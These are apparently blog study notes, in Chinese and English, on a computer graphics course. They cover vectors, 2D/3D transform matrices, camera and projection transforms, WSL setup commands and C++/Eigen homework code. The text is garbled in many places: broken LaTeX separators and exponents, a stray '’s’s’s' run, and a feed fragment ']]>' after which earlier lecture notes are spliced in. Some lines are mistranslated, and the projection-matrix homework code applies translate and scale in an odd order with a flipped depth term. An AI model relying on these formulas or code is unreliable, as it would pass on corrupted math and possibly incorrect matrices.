    $$\mathbf{S}(s_x,s_y)=\begin{pmatrix}s_x&0&0\0&s_y&0\0&0&1\end{pmatrix}$$

    Rotation 旋转

    $$\mathbf{R}(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0\\sin\alpha&\cos\alpha&0\0&0&1\end{pmatrix}$$

    Translation 平移

    $$\mathbf{T}(t_x,t_y)=\begin{pmatrix}1&0&t_x\0&1&t_y\0&0&1\end{pmatrix}$$

    Inverse Transform 逆变换

    $$\mathbf{M^{-1}}$$

    Composing Transforms 复合变换

    Sequence of affine transforms $A_1, A_2, A_3, …$ 对于仿射变换序列 $A_1, A_2, A_3, …$

    • Compose by matrix multiplication 通过矩阵乘法进行合成
      • Very important for performance! 对性能非常重要!

    $$A_n(\ldots A_2(A_1(\mathbf{x})))=\mathbf{A}_n\cdots\mathbf{A}_2\cdot\mathbf{A}_1\cdot\begin{pmatrix}x\y\1\end{pmatrix}$$

    预乘 $n$ 个矩阵以获得表示组合变换的单个矩阵。

    Decomposing Complex Transforms 分解复合变换

    png

    How to rotate around a given point $c$? 如何绕空间任意一点 $c$ 旋转?

    1. Translate center to origin 平移回原点
    2. Rotate 旋转
    3. Translate back 平移回去

    $$\mathbf{T©}\cdot\mathbf{R(\alpha)}\cdot\mathbf{T(-c)}$$

    3D Transforms

    Use homogeneous coordinates again 再次使用齐次坐标:

    • 3D point = $(x, y, z, {\color{Red}1})^T$
    • 3D vector = $(x, y, z, {\color{Red}0})^T$

    In general, $(x, y, z, w) (w \ne 0)$ is the 3D point:

    $$(x/w, y/w, z/w)$$

    3D Transformations 3D 变换

    Use $4\times 4$ matrices for affine transformations 使用 $4\times 4$ 齐次坐标表示:

    $$\begin{pmatrix}x’\y’\z’\1\end{pmatrix}=\begin{pmatrix}a&b&c&t_x\d&e&f&t_y\g&h&i&t_z\0&0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\y\z\1\end{pmatrix}$$

    先应用线性变换,再平移。

    Lecture 04 Transformation Cont.

    Viewing (观测) transformation

    • View (视图) / Camera transformation
    • Projection (投影) transformation
    • Orthographic (正交) projection
    • Perspective (透视) projection

    3D Transformations 3D 变换

    Rotation around $x$-, $y$-, or $z$-axis 沿 $x$、$y$、$z$ 轴旋转:

    png

    $$\mathbf{R}_x(\alpha)=\begin{pmatrix}1&0&0&0\0&\cos\alpha&-\sin\alpha&0\0&\sin\alpha&\cos\alpha&0\0&0&0&1\end{pmatrix}$$

    $$\mathbf{R}_y(\alpha)=\begin{pmatrix}\cos\alpha&0&\sin\alpha&0\0&1&0&0\-\sin\alpha&0&\cos\alpha&0\0&0&0&1\end{pmatrix}$$

    $$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\sin\alpha&\cos\alpha&0&0\0&0&1&0\0&0&0&1\end{pmatrix}$$

    Compose any 3D rotation from $\mathbf{R}_x$, $\mathbf{R}_y$, $\mathbf{R}_z$? 让 $\mathbf{R}_x$, $\mathbf{R}_y$, $\mathbf{R}_z$ 构成任意三维旋转?

    $$\mathbf{R}_{xyz}(\alpha,\beta,\gamma)=\mathbf{R}_x(\alpha)\mathbf{R}_y(\beta)\mathbf{R}_z(\gamma)$$

    • So-called Euler angles 所谓的欧拉角
    • Often used in flight simulators: roll, pitch, yaw 常用于飞行模拟器:滚转、俯仰、偏航

    png

    Rodrigues’ Rotation Formula 罗德里格斯轮换公式

    绕轴 $n(n_x,n_y, n_z)$ 旋转角度 $\alpha$:

    $$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\n_z&0&-n_x\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

    View / Camera Transformation 视图变换

    • What is view transformation? 什么是视图变换?
    • Think about how to take a photo 考虑拍照
      • Find a good place and arrange people (model transformation) 摆好场景:模型变换
      • Find a good “angle” to put the camera (view transformation) 选好视角:视图变换
      • Cheese! (projection transformation) 拍照:投影变换
    • How to perform view transformation? 如何进行视图变换?
      • Define the camera first 首先定义一个相机
        • Position 位置 $\vec{e}$
        • Look-at / gaze direction 注视/凝视方向 $\hat g$
        • Up direction 上方向 $\hat t$

    png

    • Key observation 重点观察

      • If the camera and all objects move together, the “photo” will be the same 如果相机和所有物体一起移动,“照片”将是相同的
    • How about that we always transform the camera to 不如我们总是把相机变成

      • The origin, up at $Y$, look at $-Z$ 处于原点,上方为 $Y$ 轴,看着 $-Z$ 轴方向
      • And transform the objects along with the camera 并随相机变换对象
    • Transform the camera by $M_{view}$

    • So it’s located at the origin, up at $Y$, look at $-Z$ 所以它位于原点,向上看 $Y$,看 $-Z$

    • $M_{view}$ in math? $M_{view}=R_{view}T_{view}$

      • Translates $e$ to origin

        $T_{view}=\begin{bmatrix}1&0&0&-x_e\0&1&0&-y_e\0&0&1&-z_e\0&0&0&1\end{bmatrix}$

      • Rotates $g$ to $-Z$、Rotates $t$ to $Y$、Rotates ($g \times t$) To $X$

        • Difficult to write! 将 $g$ 旋转到 $-Z$ 轴、将 $t$ 旋转到 $Y$ 轴、将 ($g \times t$) 旋转到 $X$ 轴,描述成矩阵是很复杂的!

        • 考虑求其逆变换

          $R_{view}^{-1}=\begin{bmatrix}x_{\hat{g}\times\hat{t}}&x_{t}&x_{-g}&0\y_{\hat{g}\times\hat{t}}&y_{t}&y_{-g}&0\z_{\hat{g}\times\hat{t}}&z_{t}&z_{-g}&0\0&0&0&1\end{bmatrix}$

        • 由于旋转矩阵是正交矩阵,其逆为它的转置,因此易求得 $R_{view}$

          $R_{view}=\begin{bmatrix}x_{\hat{g}\times\hat{t}}&y_{\hat{g}\times\hat{t}}&z_{\hat{g}\times\hat{t}}&0\x_t&y_t&z_t&0\x_{-g}&y_{-g}&z_{-g}&0\0&0&0&1\end{bmatrix}$

    • Summary 总结

      • Transform objects together with the camera 与摄影机一起变换对象
      • Until camera’s at the origin, up at $Y$, look at $-Z$ 直到相机移动到原点,以 $Y$ 轴为上方,视点在 $-Z$ 轴方向。
    • Also known as ModelView Transformation 也称为 ModelView 变换

    Projection Transformation 投影变换

    • Projection in Computer Graphics 投影在计算机图形学
      • 3D to 2D
      • Orthographic projection 正交投影
      • Perspective projection 透视投影

    png

    Orthographic Projection 正交投影

    • A simple way of understanding 简单的理解方法

      • Camera located at origin, looking at $-Z$, up at $Y$ (looks familiar?) 相机移动到原点,以 $Y$ 轴为上方,视点在 $-Z$ 轴方向
      • Drop $Z$ coordinate 删除 $Z$ 坐标
      • Translate and scale the resulting rectangle to $[-1, 1]^2$ 将生成的矩形平移并缩放到 $[-1,1]^2$
    • In General

      • We want to map a cuboid $[l, r]\times [b, t]\times [f, n]$ to the “canonical” cube $[-1, 1]^3$

        我们想把长方体 $[l,r]\times[b,t]\times[f,n]$ 映射到“规范(正则、规范、标准)” 的立方体 $[-1,1]^3$

    • Slightly different orders (to the “simple way”)

      • Center cuboid by translating 通过平移使长方体居中
      • Scale into “canonical” cube 缩放为“规范”多维数据集

    $r,l,t,b,n,f$ 的定义如下所示:

    $x$ 轴坐标范围:$[l,r]$

    $y$ 轴坐标范围:$[b,t]$

    $z$ 轴坐标范围:$[f,n]$

    png

    • Transformation matrix?

      • Translate (center to origin) first, then scale (length/width/height to 2) 首先平移(中心到原点)然后缩放(长度/宽度/高度到 2)

        $M_{ortho}=\begin{bmatrix}\frac2{r-l}&0&0&0\0&\frac2{t-b}&0&0\0&0&\frac2{n-f}&0\0&0&0&1\end{bmatrix}\begin{bmatrix}1&0&0&-\frac{r+l}2\0&1&0&-\frac{t+b}2\0&0&1&-\frac{n+f}2\0&0&0&1\end{bmatrix}$

    • Caveat 警告

      • Looking at / along $-Z$ is making near and far not intuitive ($n > f$) 观察/沿着 $-Z$ 轴使远近不直观($n>f$)
        • $n$ 和 $f$ 是负的,$|f|>|ns’s’s’s’s’s|$。
      • FYI: that’s why OpenGL (a Graphics API) uses left hand coords. 仅供参考:这就是 OpenGL(图形 API)使用左手坐标的原因。

    Perspective Projection 透视投影

    • Most common in Computer Graphics, art, visual system 最常见于计算机图形学、艺术、视觉系统
    • Further objects are smaller 其他物体较小
    • Parallel lines not parallel; converge to single point 平行线不平行;收敛到单点

    png

    • How to do perspective projection 如何进行透视投影

      • First “squish” the frustum into a cuboid ($n \to n$, $f \to f$) ($M_{persp\to ortho}$)

        首先将截头体“压扁”成长方体($n\to n$,$f\to f$)($M_{persp\to ortho}$)

      • Do orthographic projection ($M_{ortho}$, already known!) 做正交投影($M_{ortho}$,已经知道了!)

    png

    • In order to find a transformation 为了找到变换(推导出矩阵 $M_{persp\to ortho}$)

      • Recall the key idea: Find the relationship between transformed points $(x’, y’,z’)$ and the original points $(x, y, z)$

        回想关键思想:找到转换之间的关系点 $(x’, y’,z’)$ 和原始点 $(x, y, z)$

        $y^{\prime}=\frac nzy$

        $x^{\prime}=\frac nzx$

    png

    • In homogeneous coordinates, 齐次坐标下,

      $\begin{pmatrix}x\y\z\1\end{pmatrix}\Rightarrow\begin{pmatrix}nx/z\ny/z\\text{unknown}\1\end{pmatrix}==\begin{pmatrix}nx\ny\\text{still unknown}\z\end{pmatrix}$

    • So the “squish” (persp to ortho) projection does this 所以“挤压”(透视到正交)投影可以做到这一点

      $M_{persp\to ortho}^{(4\times4)}\begin{pmatrix}x\y\z\1\end{pmatrix}=\begin{pmatrix}nx\ny\\text{unknown}\z\end{pmatrix}$

    • Already good enough to figure out part of $M_{persp\to ortho}$ 可以求得 $M_{persp\to ortho}$ 的一部分:

      $M_{persp\to ortho}=\begin{pmatrix}n&0&0&0\0&n&0&0\?&?&?&?\0&0&1&0\end{pmatrix}$

    • Observation: the third row is responsible for $z’$ 观察:第三排负责 $z’$

      • Any point on the near plane will not change 近平面上的任何点都不会改变

      • Any point’s z on the far plane will not change 远平面上的任何点的 $z$ 都不会改变

    • Any point on the near plane will not change 近平面上的任何点都不会改变

      $M_{persp\to ortho}^{(4\times4)}\begin{pmatrix}x\y\z\1\end{pmatrix}=\begin{pmatrix}nx\ny\\text{unknown}\z\end{pmatrix}\overset{\text{replace z with n}}{\operatorname*{\to}}\begin{pmatrix}x\y\n\1\end{pmatrix}\Rightarrow\begin{pmatrix}x\y\n\1\end{pmatrix}==\begin{pmatrix}nx\ny\n^2\n\end{pmatrix}$

    • So the third row must be of the form $(0\ 0\ A\ B)$ 所以第三行的形式必须是$(0\ 0\ A\ B)$

      $\begin{pmatrix}0&0&A&B\end{pmatrix}\begin{pmatrix}x\y\n\1\end{pmatrix}=n^2$

    • What do we have now?

      $\begin{pmatrix}0&0&A&B\end{pmatrix}\begin{pmatrix}x\y\n\1\end{pmatrix}=n^2\to An+B=n^2$

    • Any point’s z on the far plane will not change 近平面上的任何点都不会改变

      $\begin{pmatrix}0\0\f\1\end{pmatrix}\Rightarrow\begin{pmatrix}0\0\f\1\end{pmatrix}==\begin{pmatrix}0\0\f^2\f\end{pmatrix}\quad\to\quad Af+B=f^2$

    • Solve for $A$ and $B$

      $\begin{aligned}An+B&=n2\Af+B&=f2\end{aligned}\quad\to\quad\begin{aligned}A&=n+f\B&=-nf\end{aligned}$

    • Finally, every entry in $M_{persp\to ortho}$ is known!

    • What’s next?

      • 完成正交投影($M_{ortho}$)
      • $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$

    HW0

    环境配置

    WSL2 下:

    sudo apt-get install xfce4-terminal
    sudo apt-get install xfce4

    配置环境变量:

    echo "export DISPLAY=localhost:0">> ~/.bashrc

    MobaXterm 下配置 wsl2:

    png

    开跑!

    png

    安装库:

    sudo apt update
    sudo apt install g++ gdb cmake
    sudo apt install libopencv-dev libeigen3-dev
    sudo apt install libglu1-mesa-dev freeglut3-dev mesa-common-dev xorg-dev

    Windows 下的 VSCode,安装 wsl 插件,点击左下角,连接 wsl。

    png

    打开作业模板,有如下命令:

    • mkdir build: 创建名为 build 的文件夹。
    • cd build: 移动到 build 文件夹下。
    • cmake ..: 注意其中 ’…’ 表示上一级目录,若为 ’.’ 则表示当前目录。
    • make: 编译程序,错误提示会显示在终端中。
    • ./Transformation:若上一步无错误,则可运行程序(这里 Transformation 为可执行文件名,可参照 CMakeLists.txt 中修改)。

    写一个 compile.sh 便于编译:

    rm -rf build
    mkdir build
    cd build
    cmake ..
    make
    ./Transformation
    cd ../

    修改权限:

    chmod a+x compile.sh

    开跑!

    sh compile.sh

    作业

    写一个用于的 sh:

    rm -rf build
    mkdir build
    cd build
    cmake ..
    make -j4
    cd ../

    示例代码

    #include<cmath>
    #include<eigen3/Eigen/Core>
    #include<eigen3/Eigen/Dense>
    #include<iostream>

    int main(){

    // Basic Example of cpp
    std::cout << "Example of cpp \n";
    float a = 1.0, b = 2.0;
    std::cout << a << std::endl;
    std::cout << a/b << std::endl;
    std::cout << std::sqrt(b) << std::endl;
    std::cout << std::acos(-1) << std::endl;
    std::cout << std::sin(30.0/180.0*acos(-1)) << std::endl;

    // Example of vector
    std::cout << "Example of vector \n";
    // vector definition
    Eigen::Vector3f v(1.0f,2.0f,3.0f);
    Eigen::Vector3f w(1.0f,0.0f,0.0f);
    // vector output
    std::cout << "Example of output \n";
    std::cout << v << std::endl;
    // vector add
    std::cout << "Example of add \n";
    std::cout << v + w << std::endl;
    // vector scalar multiply
    std::cout << "Example of scalar multiply \n";
    std::cout << v * 3.0f << std::endl;
    std::cout << 2.0f * v << std::endl;

    // Example of matrix
    std::cout << "Example of matrix \n";
    // matrix definition
    Eigen::Matrix3f i,j;
    i << 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0;
    j << 2.0, 3.0, 1.0, 4.0, 6.0, 5.0, 9.0, 7.0, 8.0;
    // matrix output
    std::cout << "Example of output \n";
    std::cout << i << std::endl;
    // matrix add i + j
    // matrix scalar multiply i * 2.0
    // matrix multiply i * j
    // matrix multiply vector i * v

    return 0;
    }

    题目

    给定一个点 $P=(2,1)$, 将该点绕原点先逆时针旋转 $45^\circ$,再平移
    $(1,2)$,计算出变换后点的坐标(要求用齐次坐标进行计算)。


    $P$ 以齐次坐标的表示形式为 $(2, 1, 1)^T$

    旋转矩阵为 $R(\pi/4)=\begin{bmatrix}\cos \pi/4 & -\sin \pi/4 & 0 \\sin \pi/4 & \cos \pi/4 & 0 \0 & 0 & 1 \end{bmatrix}$

    平移矩阵 $T(1, 2)=\begin{bmatrix}1 & 0 & 1 \0 & 1 & 2 \0 & 0 & 1\end{bmatrix}$

    最终坐标为 $TRP$。

    #include<cmath>
    #include<eigen3/Eigen/Core>
    #include<eigen3/Eigen/Dense>
    #include<iostream>
    #define PI 3.1415926535
    using namespace std;
    using namespace Eigen;

    int main()
    {
    float theta = PI / 4.0f;
    Vector3f P(2.0f, 1.0f, 1.0f);
    Matrix3f R, T;
    R <<
    cos(theta), -sin(theta), 0,
    sin(theta), cos(theta), 0,
    0, 0, 1;
    T <<
    1, 0, 1,
    0, 1, 2,
    0, 0, 1;
    cout << T * R * P << endl;
    return 0;
    }
    1.70711
    4.12132
    1

    HW1

    本次作业的任务是填写一个旋转矩阵和一个透视投影矩阵。给定三维下三个点 $v_0(2.0, 0.0,−2.0)$, $v_1(0.0, 2.0,−2.0)$, $v_2(−2.0, 0.0,−2.0)$, 你需要将这三个点的坐标变换为屏幕坐标并在屏幕上绘制出对应的线框三角形(在代码框架中,我们已经提供了draw_triangle 函数,所以你只需要去构建变换矩阵即可)。

    • get_model_matrix(float rotation_angle): 逐个元素地构建模型变换矩阵并返回该矩阵。

    代公式:$$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\sin\alpha&\cos\alpha&0&0\0&0&1&0\0&0&0&1\end{pmatrix}$$

    Eigen::Matrix4f get_model_matrix(float rotation_angle)
    {
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the model matrix for rotating the triangle around the Z axis.
    // Then return it.

    float angle = rotation_angle * MY_PI / 180.0f;

    Eigen::Matrix4f translate;
    translate << std::cos(angle), -std::sin(angle), 0, 0,
    std::sin(angle), std::cos(angle), 0, 0,
    0, 0, 1, 0,
    0, 0, 0, 1;
    model = translate * model;
    return model;
    }
    • get_projection_matrix(float eye_fov, float aspect_ratio, float zNear, float zFar): 使用给定的参数逐个元素地构建透视投影矩阵并返回该矩阵。

    代公式:$\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$

    其中:

    $M_{persp\to ortho}$,映射到“规范(正则、规范、标准)” 的立方体 $[-1,1]^3$,因此:

    $M_{persp\to ortho}=\begin{bmatrix}\mathrm{zNear}&0&0&0\0&\mathrm{zNear}&0&0\0&0&\mathrm{zNear}+\mathrm{zFar}&-\mathrm{zNear}\times\mathrm{zFar}\0&0&1&0\end{bmatrix}$


    $M_{ortho}=\begin{bmatrix}\frac2{r-l}&0&0&0\0&\frac2{t-b}&0&0\0&0&\frac2{n-f}&0\0&0&0&1\end{bmatrix}\begin{bmatrix}1&0&0&-\frac{r+l}2\0&1&0&-\frac{t+b}2\0&0&1&-\frac{n+f}2\0&0&0&1\end{bmatrix}$

    png

    具体地,如上图,zNear 即为 $n$,zFar 即为 $z$,$\frac yz=\tan{(\mathrm{eye_fov}/2)}$。

    由于右手坐标系 $n$ 和 $f$ 为负,因此:

    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    最后 $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$ 即为所求。

    完整代码:

    Eigen::Matrix4f get_projection_matrix(float eye_fov, float aspect_ratio,
    float zNear, float zFar)
    {
    // Students will implement this function

    Eigen::Matrix4f projection = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the projection matrix for the given parameters.
    // Then return it.

    Eigen::Matrix4f M_P;
    M_P << zNear, 0, 0, 0,
    0, zNear, 0, 0,
    0, 0, zNear + zFar, -(zNear * zFar),
    0, 0, 1, 0;

    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    Eigen::Matrix4f M_T;
    M_T << 1, 0, 0, -(r + l) / 2,
    0, 1, 0, -(t + b) / 2,
    0, 0, 1, -(n + f) / 2,
    0, 0, 0, 1;

    Eigen::Matrix4f M_S;
    M_S << 2 / (r - l), 0, 0, 0,
    0, 2 / (t - b), 0, 0,
    0, 0, 2 / (f - n), 0,
    0, 0, 0, 1;

    projection = M_T * M_S * M_P * projection;
    return projection;
    }

    运行时:

    • n = -0.1
    • f = -50
    • t = -0.0414214
    • b = 0.0414214
    • r = -0.0414214
    • l = 0.0414214

    提高项:在 main.cpp 中构造一个函数,该函数的作用是得到绕任意
    过原点的轴的旋转变换矩阵。Eigen::Matrix4f get_rotation(Vector3f axis, float angle)

    代公式:$$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\n_z&0&-n_x\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

    Eigen::Matrix4f get_rotation(Vector3f axis, float angle)
    {
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    float alpha = angle * MY_PI / 180.0f;
    float nx = axis[0];
    float ny = axis[1];
    float nz = axis[2];
    Eigen::Matrix3f M;
    M <<
    0, -nz, ny,
    nz, 0, -nx,
    -ny, nx, 0;
    Eigen::Matrix3f R = std::cos(alpha) * Eigen::Matrix3f::Identity() + (1 - std::cos(alpha)) * axis * axis.transpose() + std::sin(alpha) * M;
    Eigen::Matrix4f translate = Eigen::Matrix4f::Identity();
    translate.block<3, 3>(0, 0) = R;

    model = translate * model;
    return model;
    }
    ]]>
    + 资源

    课程

    Lecture 01 Overview of Computer Graphics

    What is Computer Graphics?图形学的应用:

    • Viedo Games 游戏

    • Movies 电影特效

    • Animations 动画

    • Design 设计

    • Visualization 可视化

    • Visual Reality 虚拟现实

    • Augmented Reality 增强现实

    • Digital Illustration 数字化描述

    • Simulation 模拟

    • Graphical User Interfaces, GUI 图形用户接口

    • Typography 字体


    Why study Computer Graphics?

    • Computer Graphics is AWESOME!

    Course Topics(mainly 4 parts)

    • Rasterization 光栅化

      • Project geometry primitives (3D triangles / polygons) onto the screen 将几何图元(三维三角形/多边形)投影到屏幕上
      • Break projected primitives into fragments (pixels) 将投影基元分解为片段(像素)
      • Gold standard in Video Games (Real-time Applications) 视频游戏(实时应用)的黄金标准
    • Curves and Meshes 曲线和模型

      • How to represent geometry in Computer Graphics 如何在计算机图形学中表示几何图形
    • Ray Tracing 光线追踪

      • Shoot rays from the camera though each pixel 通过每个像素从相机拍摄光线
        • Calculate intersection and shading 计算交点和着色
        • Continue to bounce the rays till they hit light sources 继续反射光线,直到光线碰到光源
        • Gold standard in Animations / Movies (Offline Applications) 动画/电影黄金标准(离线应用程序)
    • Animation / Simulation 动画 / 模拟

      • Key frame Animation 关键帧动画
      • Mass-spring System 质量弹簧系统

    计算机图形学、计算机视觉、数字图像处理的区别:

    png

    Lecture 02 Review of Linear Algebra

    A Swift and Brutal Introduction to Linear Algebra! 一份对线性代数的迅速直接的介绍!

    Graphics’ Dependencies 图形相关的依赖项

    • Basic mathematics 基础数学

      • Linear algebra, calculus, statistics 线性代数、微积分、统计学
    • Basic physics 基础物理学

      • Optics, Mechanics 光学、力学
    • Misc 杂项

      • Signal processing 信号处理

      • Numerical analysis 数值分析

    • And a bit of aesthetics 还有一点美学

    This Course

    • More dependent on Linear Algebra 更多依赖于线性代数
      • Vectors (dot products, cross products, …) 向量(点积、叉积等)
      • Matrices (matrix-matrix, matrix-vector mult., …) 矩阵(矩阵相乘、矩阵与向量相乘等)
    • For example,
      • A point is a vector? 一个点是一个向量吗?
      • An operation like translating or rotating objects can be matrix-vector multiplication 类似平移或旋转物体的操作可以通过矩阵与向量相乘实现

    Vectors

    • 通常被写作 $\vec{a}$ 或 $\boldsymbol{a}$

    • 向量的长度被写作 $\left|\left|\vec{a}\right|\right|$

    • 向量的归一化,方向不变,长度设为 1:$\hat{a}=\vec{a}/|\vec{a}|$

    Cartesian Coordinates 笛卡尔坐标系

    $$\mathbf{A}=\begin{pmatrix}x\y\end{pmatrix}$$

    $$\mathbf{A}^T=\left(x,y\right)$$

    $$||\mathbf{A}|=\sqrt{x2+y2}$$

    Dot (scalar) Product 向量点乘

    $$\vec{a}\cdot\vec{b}=|\vec{a}||\vec{b}|\cos\theta $$

    $$\begin{aligned}\cos\theta&=\frac{\vec a\cdot\vec b}{|\vec a||\vec b|}\end{aligned}$$

    对于 Unit Vectors 单位向量:

    $$\cos\theta=\hat{a}\cdot\hat{b}$$

    性质:

    交换律:$\vec{a}\cdot\vec{b}=\vec{b}\cdot\vec{a}$

    分配律:$\vec{a}\cdot(\vec{b}+\vec{c})=\vec{a}\cdot\vec{b}+\vec{a}\cdot\vec{c}$

    结合律:$(k\vec{a})\cdot\vec{b}=\vec{a}\cdot(k\vec{b})=k(\vec{a}\cdot\vec{b})$

    Dot Product in Cartesian Coordinates 笛卡尔坐标系下的向量点乘

    Component-wise multiplication, then adding up 分量逐个相乘,然后求和

    • In 2D

      • $\vec{a}\cdot\vec{b}=\begin{pmatrix}x_a\y_a\end{pmatrix}\cdot\begin{pmatrix}x_b\y_b\end{pmatrix}=x_ax_b+y_ay_b$
    • In 3D

      • $\vec a\cdot\vec b=\begin{pmatrix}x_a\y_a\z_a\end{pmatrix}\cdot\begin{pmatrix}x_b\y_b\z_b\end{pmatrix}=x_ax_b+y_ay_b+z_az_b$

    Dot Product in Graphics 向量点乘在图形学中的应用

    • Find angle between two vectors (e.g. cosine of angle between light source and surface) 寻找两个向量之间的夹角,例如光源和表面之间的夹角的余弦值。

    • Finding projection of one vector on another 找到一个向量在另一个向量上的投影。

      • $\vec{b}_{\perp}$:$\vec{b}$ 在 $\vec{a}$ 方向的投影。
        • $\vec{b}_{\perp}$ 必须与 $\vec{a}$ 或 $\hat{a}$ 平行。
          • $\vec{b}{\perp}=k\hat{a}, k=|\vec{b}\perp|=|\vec{b}|\cos\theta $
    • Measure how close two directions are 测量两个方向之间的接近程度

    • Decompose a vector 分解一个向量

    • Determine forward / backward 确定正向/反向

    Cross (vector) Product 矢量积

    png

    • Cross product is orthogonal to two initial vectors 叉乘结果与两个初始向量垂直
    • Direction determined by right-hand rule 方向由右手定则确定
    • Useful in constructing coordinate systems (later) 在构建坐标系时非常有用

    性质:

    对于右手坐标系:

    $$\vec{x}\times\vec{y}=+\vec{z}$$

    $$\vec{y}\times\vec{x}=-\vec{z}$$

    $$\vec{y}\times\vec{z}=+\vec{x}$$

    $$\vec{z}\times\vec{y}=-\vec{x}$$

    $$\vec{z}\times\vec{x}=+\vec{y}$$

    $$\vec{x}\times\vec{z}=-\vec{y}$$

    不满足交换律:$\vec{a}\times\vec{b}=-\vec{b}\times\vec{a}$

    跟自身叉乘为零向量:$\vec{a}\times\vec{a}=\vec{0}$

    满足分配律:

    $\vec{a}\times(\vec{b}+\vec{c})=\vec{a}\times\vec{b}+\vec{a}\times\vec{c}$

    $\vec{a}\times(k\vec{b})=k(\vec{a}\times\vec{b})$

    Cross Product: Cartesian Formula? 矢量积在笛卡尔坐标系中

    $$\vec{a}\times\vec{b}=\begin{pmatrix}y_az_b-y_bz_a\z_ax_b-x_az_b\x_ay_b-y_ax_b\end{pmatrix}$$

    $$\vec a\times\vec b=A^*b=\begin{pmatrix}0&-z_a&y_a\z_a&0&-x_a\-y_a&x_a&0\end{pmatrix}\begin{pmatrix}x_b\y_b\z_b\end{pmatrix}$$

    $A^*$ 是 $\vec{a}$ 的伴随矩阵(伴随矩阵 - 维基百科,自由的百科全书 (wikipedia.org)

    Cross Product in Graphics 矢量积在图形学中的应用

    • Determine left / right 判别左右
    • Determine inside / outside 判别内外

    Orthonormal Bases / Coordinate Frames 正交基 / 坐标系

    构建右手坐标系:

    $$|\vec{u}|=|\vec{v}|=|\vec{w}|=1$$

    $$\vec{u}\cdot\vec{v}=\vec{v}\cdot\vec{w}=\vec{u}\cdot\vec{w}=0$$

    $$\vec{w}=\vec{u}\times\vec{v}$$

    $$\vec p=(\vec p\cdot\vec u)\vec u+(\vec p\cdot\vec v)\vec v+(\vec p\cdot\vec w)\vec w$$

    Matrix 矩阵

    Matrix-Matrix Multiplication 矩阵乘法

    一般不满足交换律(一般不满足 $AB\ne BA$)

    满足结合律和分配律:

    • $(AB)C=A(BC)$
    • $A(B+C)=AB+AC$
    • $(A+B)C=AC+BC$

    $$(AB)T=BTA^T$$

    Identity Matrix 单位矩阵

    $$I_{3\times3}=\begin{pmatrix}1&0&0\0&1&0\0&0&1\end{pmatrix}$$

    $$AA{-1}=A{-1}A=I$$

    $$(AB){-1}=B{-1}A^{-1}$$

    Vector multiplication in Matrix form 向量与矩阵相乘

    • Dot product 点乘

    $$\vec{a}\cdot\vec{b}=\vec{a}^T\vec{b}$$

    $$=\begin{pmatrix}x_a&y_a&z_a\end{pmatrix}\begin{pmatrix}x_b\y_b\z_b\end{pmatrix}=\begin{pmatrix}x_ax_b+y_ay_b+z_az_b\end{pmatrix}$$

    • Cross product 叉乘

    $$\vec a\times\vec b=A^*b=\begin{pmatrix}0&-z_a&y_a\z_a&0&-x_a\-y_a&x_a&0\end{pmatrix}\begin{pmatrix}x_b\y_b\z_b\end{pmatrix}$$

    Lecture 03 Transformation

    2D Transform 二维变换

    Scale Transform 缩放

    等比缩放:

    $$x^{\prime}=sx$$

    $$y^{\prime}=sx$$

    用矩阵乘法表示:

    $$\left.\left[\begin{array}{c}x’\y’\end{array}\right.\right]=\left[\begin{array}{cc}s&0\0&s\end{array}\right]\left[\begin{array}{c}x\y\end{array}\right]$$

    Scale (Non-Uniform) 任意缩放

    $$\begin{bmatrix}x’\y’\end{bmatrix}=\begin{bmatrix}s_x&0\0&s_y\end{bmatrix}\begin{bmatrix}x\y\end{bmatrix}$$

    Reflection Matrix 镜像

    Horizontal reflection 水平镜像:

    $$x^{\prime}=-x$$

    $$y^{\prime}=y$$

    用矩阵乘法表示:

    $$\begin{bmatrix}x’\y’\end{bmatrix}=\begin{bmatrix}-1&0\0&1\end{bmatrix}\begin{bmatrix}x\y\end{bmatrix}$$

    Shear Matrix 斜切:

    png

    Hints:

    • Horizontal shift is $0$ at $y=0$
    • Horizontal shift is $a$ at $y=1$
    • Vertical shift is always $0$

    $$\begin{bmatrix}x’\y’\end{bmatrix}=\begin{bmatrix}1&a\0&1\end{bmatrix}\begin{bmatrix}x\y\end{bmatrix}$$

    Rotation Matrix 旋转

    $$\mathbf{R}_\theta=\begin{bmatrix}\cos\theta&-\sin\theta\\sin\theta&\cos\theta\end{bmatrix}$$

    旋转相反的角等于矩阵的逆,等于矩阵的转置:

    旋转矩阵是正交矩阵

    $$\mathbf{R}{-\theta}=\mathbf{R}\theta{-1}=\mathbf{R}_{\theta}T$$

    Linear Transforms = Matrices 线性变换 = 矩阵

    $$x^{\prime}=ax+by$$

    $$y^{\prime}=cx+dy$$

    $$\left.\left[\begin{array}{c}x’\y’\end{array}\right.\right]=\left[\begin{array}{cc}a&b\c&d\end{array}\right]\left[\begin{array}{c}x\y\end{array}\right]$$

    简写为:

    $$\mathbf{x}^{\prime}=\mathbf{M}\mathbf{x}$$

    Translation 平移

    $$x^{\prime}=x+t_x$$

    $$y^{\prime}=y+t_y$$

